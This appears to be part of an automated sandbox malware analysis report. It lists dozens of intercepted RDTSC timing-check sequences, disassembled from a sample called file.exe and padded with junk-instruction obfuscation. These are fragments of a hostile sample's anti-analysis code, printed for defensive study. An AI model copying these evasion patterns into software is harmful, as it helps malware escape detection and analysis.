              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B1E3B second address: 8B1E5B instructions: 0x00000000 rdtsc 0x00000002 jns 00007F92851B8946h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F92851B8954h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B1E5B second address: 8B1EB0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007F9284AFDC88h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 0000001Dh 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 mov ebx, dword ptr [ebp+12485DBDh] 0x00000028 sub edx, dword ptr [ebp+122D35ECh] 0x0000002e add eax, ebx 0x00000030 jmp 00007F9284AFDC8Fh 0x00000035 nop 0x00000036 push eax 0x00000037 push edx 0x00000038 ja 00007F9284AFDC88h 0x0000003e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B1EB0 second address: 8B1EBA instructions: 0x00000000 rdtsc 0x00000002 jc 00007F92851B894Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90431E second address: 904334 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9284AFDC8Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b popad 0x0000000c pop eax 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 906CD2 second address: 906CD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 906CD6 second address: 906CDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 906CDC second address: 906D0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F92851B8962h 0x0000000c jnp 00007F92851B8952h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 906D0C second address: 906D12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 906EA7 second address: 906EAD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90EA06 second address: 90EA0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90CB80 second address: 90CB98 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jng 00007F92851B8946h 0x0000000d jo 00007F92851B8946h 0x00000013 push edi 0x00000014 pop edi 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90CB98 second address: 90CBAD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9284AFDC8Bh 0x00000007 ja 00007F9284AFDC92h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90CBAD second address: 90CBDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F92851B8946h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F92851B8956h 0x00000013 push eax 0x00000014 push edx 0x00000015 jng 00007F92851B8946h 0x0000001b push esi 0x0000001c pop esi 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90CBDB second address: 90CBE1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90CBE1 second address: 90CBEB instructions: 0x00000000 rdtsc 0x00000002 jl 00007F92851B894Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90D017 second address: 90D02D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9284AFDC8Bh 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90D02D second address: 90D031 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90D031 second address: 90D039 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90D039 second address: 90D047 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jo 00007F92851B8946h 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90D047 second address: 90D04B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90D37F second address: 90D389 instructions: 0x00000000 rdtsc 0x00000002 je 00007F92851B8946h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E70080 second address: 4E70086 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E70086 second address: 4E7008A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E7008A second address: 4E7008E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E7008E second address: 4E7011A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F92851B8959h 0x0000000f push FFFFFFFEh 0x00000011 jmp 00007F92851B894Eh 0x00000016 push 326049FDh 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007F92851B8957h 0x00000022 sbb ah, 0000006Eh 0x00000025 jmp 00007F92851B8959h 0x0000002a popfd 0x0000002b pushad 0x0000002c mov eax, 0F7D91CDh 0x00000031 push esi 0x00000032 pop ebx 0x00000033 popad 0x00000034 popad 0x00000035 add dword ptr [esp], 443A544Bh 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007F92851B894Bh 0x00000043 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E7011A second address: 4E70120 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E70120 second address: 4E70124 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E70124 second address: 4E701AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9284AFDC8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b call 00007F9284AFDC89h 0x00000010 pushad 0x00000011 jmp 00007F9284AFDC94h 0x00000016 pushfd 0x00000017 jmp 00007F9284AFDC92h 0x0000001c or esi, 5DD1D7A8h 0x00000022 jmp 00007F9284AFDC8Bh 0x00000027 popfd 0x00000028 popad 0x00000029 push eax 0x0000002a pushad 0x0000002b pushfd 0x0000002c jmp 00007F9284AFDC8Fh 0x00000031 jmp 00007F9284AFDC93h 0x00000036 popfd 0x00000037 mov edx, esi 0x00000039 popad 0x0000003a mov eax, dword ptr [esp+04h] 0x0000003e pushad 0x0000003f pushad 0x00000040 mov di, 7CE4h 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E701AE second address: 4E701DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 call 00007F92851B8956h 0x0000000b pop ecx 0x0000000c pop edi 0x0000000d popad 0x0000000e mov eax, dword ptr [eax] 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F92851B894Ch 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E701DD second address: 4E7021E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9284AFDC8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d pushad 0x0000000e mov eax, ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushfd 0x00000013 jmp 00007F9284AFDC91h 0x00000018 sub cx, 5FE6h 0x0000001d jmp 00007F9284AFDC91h 0x00000022 popfd 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E7021E second address: 4E70249 instructions: 0x00000000 rdtsc 0x00000002 movzx ecx, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 pop eax 0x00000009 jmp 00007F92851B8953h 0x0000000e mov eax, dword ptr fs:[00000000h] 0x00000014 pushad 0x00000015 popad 0x00000016 push ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E70249 second address: 4E7024F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E7024F second address: 4E70255 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E70255 second address: 4E70259 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E70259 second address: 4E702A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F92851B8958h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e jmp 00007F92851B8950h 0x00000013 sub esp, 18h 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F92851B8957h 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E702A6 second address: 4E7036C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9284AFDC99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F9284AFDC8Ch 0x00000011 and ax, 5838h 0x00000016 jmp 00007F9284AFDC8Bh 0x0000001b popfd 0x0000001c jmp 00007F9284AFDC98h 0x00000021 popad 0x00000022 push eax 0x00000023 pushad 0x00000024 push edi 0x00000025 push esi 0x00000026 pop edi 0x00000027 pop esi 0x00000028 pushfd 0x00000029 jmp 00007F9284AFDC99h 0x0000002e jmp 00007F9284AFDC8Bh 0x00000033 popfd 0x00000034 popad 0x00000035 xchg eax, ebx 0x00000036 pushad 0x00000037 pushfd 0x00000038 jmp 00007F9284AFDC94h 0x0000003d xor ecx, 6E895758h 0x00000043 jmp 00007F9284AFDC8Bh 0x00000048 popfd 0x00000049 call 00007F9284AFDC98h 0x0000004e push eax 0x0000004f push edx 0x00000050 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E7036C second address: 4E703CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push ecx 0x00000007 pushad 0x00000008 call 00007F92851B894Ah 0x0000000d mov cx, CB01h 0x00000011 pop eax 0x00000012 pushad 0x00000013 mov edi, 314BAD00h 0x00000018 mov eax, edx 0x0000001a popad 0x0000001b popad 0x0000001c mov dword ptr [esp], esi 0x0000001f jmp 00007F92851B894Bh 0x00000024 xchg eax, edi 0x00000025 pushad 0x00000026 mov edx, ecx 0x00000028 pushfd 0x00000029 jmp 00007F92851B8950h 0x0000002e sub si, 8678h 0x00000033 jmp 00007F92851B894Bh 0x00000038 popfd 0x00000039 popad 0x0000003a push eax 0x0000003b pushad 0x0000003c movsx edx, ax 0x0000003f popad 0x00000040 xchg eax, edi 0x00000041 push eax 0x00000042 push edx 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E703CF second address: 4E703D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E703D3 second address: 4E703D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E703D7 second address: 4E703DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E70500 second address: 4E70504 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E70504 second address: 4E7050A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E7050A second address: 4E7050F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E7050F second address: 4E70552 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov bh, 85h 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [ebp-18h], esp 0x0000000c jmp 00007F9284AFDC92h 0x00000011 mov eax, dword ptr fs:[00000018h] 0x00000017 jmp 00007F9284AFDC90h 0x0000001c mov ecx, dword ptr [eax+00000FDCh] 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 push edx 0x00000026 pop esi 0x00000027 movsx ebx, si 0x0000002a popad 0x0000002b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E70552 second address: 4E70558 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E70558 second address: 4E7055C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E7055C second address: 4E7056C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test ecx, ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E7056C second address: 4E70570 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E70570 second address: 4E70574 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E70574 second address: 4E7057A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E7057A second address: 4E70629 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 call 00007F92851B8959h 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jns 00007F92851B89A0h 0x00000014 pushad 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007F92851B8953h 0x0000001c and cl, 0000006Eh 0x0000001f jmp 00007F92851B8959h 0x00000024 popfd 0x00000025 call 00007F92851B8950h 0x0000002a pop esi 0x0000002b popad 0x0000002c mov edx, 363603A6h 0x00000031 popad 0x00000032 add eax, ecx 0x00000034 jmp 00007F92851B894Dh 0x00000039 mov ecx, dword ptr [ebp+08h] 0x0000003c pushad 0x0000003d pushfd 0x0000003e jmp 00007F92851B894Ch 0x00000043 and cx, 6148h 0x00000048 jmp 00007F92851B894Bh 0x0000004d popfd 0x0000004e movzx esi, di 0x00000051 popad 0x00000052 test ecx, ecx 0x00000054 pushad 0x00000055 push eax 0x00000056 push edx 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E70629 second address: 4E7062D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60348 second address: 4E60403 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F92851B8959h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F92851B894Eh 0x0000000f push eax 0x00000010 pushad 0x00000011 call 00007F92851B8951h 0x00000016 jmp 00007F92851B8950h 0x0000001b pop ecx 0x0000001c pushfd 0x0000001d jmp 00007F92851B894Bh 0x00000022 or ax, 2BEEh 0x00000027 jmp 00007F92851B8959h 0x0000002c popfd 0x0000002d popad 0x0000002e xchg eax, ebp 0x0000002f pushad 0x00000030 call 00007F92851B894Ch 0x00000035 call 00007F92851B8952h 0x0000003a pop esi 0x0000003b pop edi 0x0000003c popad 0x0000003d mov ebp, esp 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007F92851B8958h 0x00000046 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60403 second address: 4E6043E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F9284AFDC91h 0x00000009 adc eax, 206E66E6h 0x0000000f jmp 00007F9284AFDC91h 0x00000014 popfd 0x00000015 mov edx, eax 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a sub esp, 2Ch 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E6043E second address: 4E60442 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60442 second address: 4E60448 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60448 second address: 4E60470 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F92851B894Ah 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebx 0x0000000e pushad 0x0000000f mov dh, ah 0x00000011 mov cx, di 0x00000014 popad 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F92851B894Bh 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60470 second address: 4E604B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9284AFDC99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F9284AFDC8Eh 0x0000000f xchg eax, edi 0x00000010 pushad 0x00000011 mov ebx, eax 0x00000013 mov ebx, eax 0x00000015 popad 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F9284AFDC92h 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E604B8 second address: 4E604CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F92851B894Eh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E604CA second address: 4E604E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9284AFDC8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, edi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov edx, 1D803C76h 0x00000014 movsx ebx, ax 0x00000017 popad 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E6051D second address: 4E60583 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dx, 525Eh 0x0000000a popad 0x0000000b mov ebx, 00000000h 0x00000010 jmp 00007F92851B8952h 0x00000015 sub edi, edi 0x00000017 jmp 00007F92851B8951h 0x0000001c inc ebx 0x0000001d pushad 0x0000001e mov ecx, 63660AB3h 0x00000023 push eax 0x00000024 push edx 0x00000025 pushfd 0x00000026 jmp 00007F92851B8956h 0x0000002b sbb ax, 90B8h 0x00000030 jmp 00007F92851B894Bh 0x00000035 popfd 0x00000036 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60583 second address: 4E60604 instructions: 0x00000000 rdtsc 0x00000002 mov bh, ah 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 test al, al 0x00000009 pushad 0x0000000a mov ax, di 0x0000000d pushfd 0x0000000e jmp 00007F9284AFDC8Dh 0x00000013 jmp 00007F9284AFDC8Bh 0x00000018 popfd 0x00000019 popad 0x0000001a je 00007F9284AFDE7Bh 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007F9284AFDC8Bh 0x00000029 jmp 00007F9284AFDC93h 0x0000002e popfd 0x0000002f pushfd 0x00000030 jmp 00007F9284AFDC98h 0x00000035 jmp 00007F9284AFDC95h 0x0000003a popfd 0x0000003b popad 0x0000003c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60604 second address: 4E6062B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F92851B8951h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea ecx, dword ptr [ebp-14h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F92851B894Dh 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E6067C second address: 4E60685 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, 3317h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60685 second address: 4E606C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 jmp 00007F92851B8958h 0x0000000d push eax 0x0000000e jmp 00007F92851B894Bh 0x00000013 nop 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F92851B8950h 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E606C6 second address: 4E606D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9284AFDC8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60749 second address: 4E6076E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 cmp dword ptr [ebp-14h], edi 0x0000000a jmp 00007F92851B894Fh 0x0000000f jne 00007F92F6CB667Fh 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E6076E second address: 4E60772 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60772 second address: 4E60776 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60776 second address: 4E6077C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E6077C second address: 4E607DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F92851B8954h 0x00000009 and al, FFFFFFF8h 0x0000000c jmp 00007F92851B894Bh 0x00000011 popfd 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 mov ebx, dword ptr [ebp+08h] 0x00000018 jmp 00007F92851B8956h 0x0000001d lea eax, dword ptr [ebp-2Ch] 0x00000020 jmp 00007F92851B8950h 0x00000025 xchg eax, esi 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 mov dl, 13h 0x0000002b push ecx 0x0000002c pop ebx 0x0000002d popad 0x0000002e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E607DB second address: 4E607E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E607E1 second address: 4E607E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E607E5 second address: 4E607E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E607E9 second address: 4E60821 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F92851B8956h 0x00000010 and cl, 00000018h 0x00000013 jmp 00007F92851B894Bh 0x00000018 popfd 0x00000019 popad 0x0000001a xchg eax, esi 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60821 second address: 4E60825 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
